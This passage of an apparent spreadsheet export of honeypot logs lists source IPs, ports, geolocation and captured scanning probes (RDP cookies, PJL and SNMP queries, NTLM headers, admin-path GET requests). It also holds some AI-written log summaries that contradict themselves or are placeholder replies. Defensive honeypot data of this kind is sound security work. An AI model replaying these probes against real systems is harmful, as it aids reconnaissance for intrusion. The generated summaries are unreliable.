    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;55650&amp;&amp;1080&amp;&amp;22&amp;&amp;30202&amp;&amp;1521&amp;&amp;110&amp;&amp;3306&amp;&amp;143&amp;&amp;6379&amp;&amp;1433&amp;&amp;NA&amp;&amp;23&amp;&amp;3389&amp;&amp;80&amp;&amp;443&amp;&amp;3262&amp;&amp;51787&amp;&amp;53814&amp;&amp;161&amp;&amp;5432&amp;&amp;51968&amp;&amp;51822&amp;&amp;5900&amp;&amp;56621&amp;&amp;445&amp;&amp;9100&amp;&amp;21&amp;&amp;6667&amp;&amp;49194&amp;&amp;55145&amp;&amp;49481&amp;&amp;55700&amp;&amp;55821&amp;&amp;53990&amp;&amp;49616&amp;&amp;53258&amp;&amp;49621&amp;&amp;55496&amp;&amp;52271&amp;&amp;49506&amp;&amp;55784&amp;&amp;51814&amp;&amp;51398</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FXWtTxQsF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zjACTF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CVEvKu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aTGsWisWR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=URvkKu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zrsGJT'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EXpEQC'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.222,64274)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.222,64284)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=waEPPDSST'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gxuThe'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JaPAwF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=owNBqvIXH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=srknKU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DvOsLI'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uCtuAfeTK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vtMjzE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZkuSVQ'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.222,65260)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oCiaHcNBI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MZoWbJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UuoINE'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xVCcdh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vTpfTn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ufgyIReRt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LRHMrq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WnIHGJ'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.222,61356)}</t>
  </si>
  <si>
    <t>::ffff:93b9:84de</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and exploit various services on a network, including identifying open ports, performing reconnaissance, and potentially executing malicious commands. &amp;&amp; The attackers are attempting to scan for active services and potential vulnerabilities on the target system. They are using various protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and SOCKS5 to gather information about the system's configuration and potential weaknesses. &amp;&amp; The malicious activities being performed by the attackers suggest that they are engaging in reconnaissance and exploitation of vulnerabilities to gain unauthorized access to systems and services. The attackers are trying to identify potential entry points, probe for weaknesses, and exploit them to install malware or steal sensitive information. &amp;&amp; The attacker is probing various services and protocols to identify potential vulnerabilities, possibly leading to exploitation. They are also attempting to authenticate with different credentials and accessing sensitive information. &amp;&amp; Based on the data, it appears that an attacker is attempting to scan and gather information about various services on a network. The attacker is likely using a port scanner or a vulnerability scanner to identify open ports and probe for vulnerabilities. &amp;&amp; This log data is empty, indicating that there are no records of malicious activity detected. It suggests that either the service was not active or the system did not capture any suspicious traffic. No threats were identified based on the provided information. &amp;&amp; A suspicious incoming SMB connection was detected from an IP address that may indicate a potential malware or ransomware attack attempt. The IP address 147.185.132.222 attempted to establish a connection on port 61356 for unknown purposes. Further investigation is needed to determine the intent behind this connection. &amp;&amp; Unknown IRC service activity detected, possibly attempting to connect or establish a connection. The data is incomplete or unavailable for analysis. Further investigation is required to determine the malicious intent. &amp;&amp; No data provided, cannot analyze. &amp;&amp; The data suggests an attempt to gather information about system configuration, likely for reconnaissance or mapping purposes of the target network.
This is a common initial step by malicious actors to assess vulnerabilities and prepare for further attacks.
No additional information was available through SNMP. &amp;&amp; This indicates a potential scan for LDAP vulnerability, where an attacker is probing for weaknesses in the system's authentication mechanism. 
The absence of specific LDAP-related information suggests it might be a reconnaissance attempt rather than an actual login attempt. 
The activity appears to be an exploratory phase before potentially launching a more targeted attack.</t>
  </si>
  <si>
    <t>Scanning and exploitation of various services &amp;&amp; Scanning &amp;&amp;   &amp;&amp;  Port scanning and credential stuffing.  &amp;&amp; The attacker is also trying to authenticate with different services, such as FTP, HTTP, HTTPS, IMAP, LDAP, MSSQL, MYSQL, NTP, Oracle, POP3, RDP, SMTP, SNMP, and SMB. This suggests that the attacker may be attempting to gain unauthorized access or exploit vulnerabilities in these services. &amp;&amp; I'm ready when you provide the log data. Please go ahead and share it. I'll analyze it and provide the requested information. &amp;&amp; SMB Scan &amp;&amp; I'd be happy to analyze some log data! However, you haven't provided any. Please go ahead and provide the log data from the honeypot monitoring malicious activities. I'll do my best to analyze it and identify the type of attack in a short phrase (max 2 words).</t>
  </si>
  <si>
    <t>821732865f65ecaaa60b472275e15a8f</t>
  </si>
  <si>
    <t>154.212.141.166</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_MYSQL_H24&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_POP3_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;110&amp;&amp;143&amp;&amp;5432&amp;&amp;3306&amp;&amp;443&amp;&amp;NA&amp;&amp;3389&amp;&amp;9100&amp;&amp;25&amp;&amp;1433&amp;&amp;23&amp;&amp;80&amp;&amp;21&amp;&amp;445</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;GET&amp;&amp;login&amp;&amp;request&amp;&amp;command&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.250.150.39:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 149.102.153.168:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.118.77:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '5.253.43.207:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.166;rport=55477'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,34100)}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.115.66:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.54.115.66:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 95.164.118.29:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,43990)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.171.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.8.76:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,48070)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (IGJuGnfq,)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,49158)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (flwulmTj,)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,40584)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (VvlONUcC,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.166;rport=36326'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8da6</t>
  </si>
  <si>
    <t>48ffe54572cecb5e7181ca031b782418</t>
  </si>
  <si>
    <t>221.156.221.59</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;51884&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dd9c:dd3b</t>
  </si>
  <si>
    <t>bc45e148db45b7906fbe2e46af6288b0</t>
  </si>
  <si>
    <t>118.40.122.9</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;52469&amp;&amp;NA</t>
  </si>
  <si>
    <t>Gwangsan-gu</t>
  </si>
  <si>
    <t>Wolgye-dong</t>
  </si>
  <si>
    <t>1833341</t>
  </si>
  <si>
    <t>506302</t>
  </si>
  <si>
    <t>35.2143</t>
  </si>
  <si>
    <t>126.837</t>
  </si>
  <si>
    <t>2007-08-03</t>
  </si>
  <si>
    <t>::ffff:7628:7a09</t>
  </si>
  <si>
    <t>99051b08e1348db8ded444183d972a8c</t>
  </si>
  <si>
    <t>196.221.164.144</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;30681&amp;&amp;1433&amp;&amp;445&amp;&amp;NA&amp;&amp;47506</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (196.221.164.144,61843)}&amp;&amp;{Data_SMB:Incoming connection (196.221.164.144,53122)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (196.221.164.144,63109)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (196.221.164.144,61300)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:c4dd:a490</t>
  </si>
  <si>
    <t>1df895eec3ad66a1141d7da0a32fdf0d</t>
  </si>
  <si>
    <t>117.199.195.118</t>
  </si>
  <si>
    <t>::ffff:75c7:c376</t>
  </si>
  <si>
    <t>809e4d177198ac73a8dd5fc01e53a7f3</t>
  </si>
  <si>
    <t>220.88.75.74</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;45115&amp;&amp;23&amp;&amp;14793&amp;&amp;266&amp;&amp;6765&amp;&amp;NA</t>
  </si>
  <si>
    <t>Yongin-si</t>
  </si>
  <si>
    <t>Yongin-si (Giheung-gu)</t>
  </si>
  <si>
    <t>10914977</t>
  </si>
  <si>
    <t>37.2717</t>
  </si>
  <si>
    <t>127.106</t>
  </si>
  <si>
    <t>::ffff:dc58:4b4a</t>
  </si>
  <si>
    <t>No suspicious Telnet activity detected. 
The lack of activity for this service does not indicate any malicious behavior. 
This is an indicator of no unusual traffic on the monitored system. &amp;&amp; No log data provided, unable to analyze or describe malicious activity. &amp;&amp; No TELNET activity detected, indicating possible scanning or probing for vulnerable services. No malicious connections were established through this service. The absence of any TELNET traffic suggests the system is not currently under attack via this method.</t>
  </si>
  <si>
    <t>Port scan</t>
  </si>
  <si>
    <t>22b27cd07b2f49a6c636176147e25d6d</t>
  </si>
  <si>
    <t>72.46.130.218</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H5&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTPS_H20&amp;&amp;SMA-LAB_HTTPS_H43</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;445&amp;&amp;8443&amp;&amp;62848&amp;&amp;389&amp;&amp;445&amp;&amp;39913&amp;&amp;42234&amp;&amp;1854&amp;&amp;12154&amp;&amp;18862&amp;&amp;37634&amp;&amp;51768&amp;&amp;1260&amp;&amp;NA&amp;&amp;53176&amp;&amp;19349&amp;&amp;1464</t>
  </si>
  <si>
    <t>NV</t>
  </si>
  <si>
    <t>Nevada</t>
  </si>
  <si>
    <t>Clark</t>
  </si>
  <si>
    <t>Las Vegas</t>
  </si>
  <si>
    <t>5506956</t>
  </si>
  <si>
    <t>89105</t>
  </si>
  <si>
    <t>36.066</t>
  </si>
  <si>
    <t>-115.139</t>
  </si>
  <si>
    <t>36114</t>
  </si>
  <si>
    <t>VegasNAP, LLC</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '91.194.11.82', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.181.21.224', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.63.23', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.97.67', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.118.77', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.79.122', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.8.69', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.146.12.172', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.180.55.39', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 